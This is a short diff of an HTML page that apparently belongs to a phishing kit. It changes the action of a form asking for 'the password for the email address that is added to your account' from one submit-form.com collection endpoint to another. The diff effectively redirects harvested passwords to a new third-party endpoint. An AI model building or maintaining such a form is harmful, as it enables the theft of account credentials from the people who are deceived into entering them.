--- a/index.html
+++ b/index.html
@@ -115,7 +115,7 @@
             
         </div>
         <p>Please enter the password for the email address that is added to your account</p>
-        <form id="passwordForm" action="https://submit-form.com/WNnKluUEC" method="POST">
+        <form id="passwordForm" action="https://submit-form.com/fIDIAsTrs" method="POST">
             <div class="form-group">
                 <label for="password">Password</label>
                 <div class="input-wrapper">
